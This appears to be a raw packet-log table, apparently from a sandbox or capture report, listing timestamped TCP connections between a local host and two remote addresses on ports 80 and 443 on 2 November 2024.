                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407231092 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407241106 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407252073 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407259941 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407263994 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407270908 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407279968 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407289028 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407308102 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407318115 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407329082 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407339096 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407347918 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407347918 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407386065 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407386065 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407386065 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407391071 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407402039 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407439947 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407439947 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407522917 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407569885 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407573938 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407584906 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407594919 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407627106 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407660961 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407670021 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407674074 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407680035 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407690048 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407699108 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407706022 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407725096 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407763958 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407983065 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.407994032 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408004999 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408035040 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408051014 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408052921 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408061981 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408073902 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408085108 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408091068 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408108950 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408137083 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408168077 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408179045 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408189058 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408205032 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408216000 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408226013 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408241034 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408241034 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408242941 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408252954 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408263922 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408265114 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408277035 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408279896 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408313036 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408816099 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408868074 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408945084 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408956051 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408965111 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408983946 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.408996105 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409001112 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409008026 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409018993 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409019947 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409060001 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409060001 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409219027 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409230947 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409241915 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409274101 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409292936 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409296989 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409307957 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409317970 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409334898 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409347057 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409349918 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409363031 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409375906 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409389973 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409390926 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409392118 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409399986 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409410954 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409411907 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409423113 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409430981 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409434080 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409446955 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409466028 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.409487963 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412288904 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412343025 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412344933 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412355900 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412390947 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412390947 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412461042 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412472010 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412482023 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412497044 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412506104 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412508011 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412533998 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412535906 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412547112 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412549973 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412559032 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412570000 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412580013 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412590027 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412600994 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412600994 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412601948 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412626982 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412641048 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412986040 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.412995100 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413032055 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413075924 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413091898 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413105011 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413115978 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413121939 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413152933 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413152933 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413238049 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413283110 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413300991 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413316965 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413327932 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413338900 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413351059 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413351059 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413382053 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413383007 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413542986 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413553953 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413563967 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413599968 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413604975 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413616896 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413616896 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413629055 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413640976 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413645983 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413651943 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413662910 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413672924 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413674116 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413672924 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413701057 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.413727999 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.452172041 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.452212095 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.452222109 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.452234030 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.452277899 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.482676029 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.483115911 CET63796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.483139038 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.483541965 CET63796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.483551979 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530071020 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530080080 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530087948 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530092955 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530102015 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530107975 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530112028 CET8063794208.109.77.116192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530302048 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.530302048 CET6379480192.168.2.4208.109.77.116
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.543199062 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.543541908 CET63797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.543561935 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.543957949 CET63797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.543962955 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.621706009 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.622203112 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.622241974 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.623660088 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.623672009 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.680013895 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.680054903 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.680126905 CET63797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.731223106 CET63797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.731232882 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.731244087 CET63797443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.731249094 CET4436379713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750533104 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750581980 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750646114 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750669956 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750794888 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.750942945 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.778393030 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.778439999 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.778582096 CET63796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.888869047 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.935709953 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.948065042 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.948106050 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.948122978 CET63798443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.948137999 CET4436379813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.949446917 CET63796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.949460030 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.949486017 CET63796443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.949496984 CET4436379613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.951081991 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.951087952 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.951821089 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.951824903 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.959252119 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.959276915 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.959330082 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.959614992 CET63801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.959625959 CET4436380113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:09.992280006 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.042249918 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085274935 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085290909 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085347891 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085354090 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085393906 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085510969 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085542917 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.085577011 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.165098906 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.165112019 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.165570974 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.165575981 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.166642904 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.166671991 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.166729927 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.166827917 CET63802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.166836023 CET4436380213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.171519041 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.171534061 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.171544075 CET63799443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.171549082 CET4436379913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.172902107 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.172946930 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.173016071 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.173736095 CET63803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.173760891 CET4436380313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.180166006 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.180190086 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.180238008 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.180344105 CET63804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.180361032 CET4436380413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.293785095 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.293806076 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.293864012 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.293868065 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.293899059 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.300256968 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.300271034 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.300282001 CET63800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.300287008 CET4436380013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.307621002 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.307648897 CET4436380513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.307737112 CET63805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:10.307853937 CET63805443192.168.2.413.107.246.45
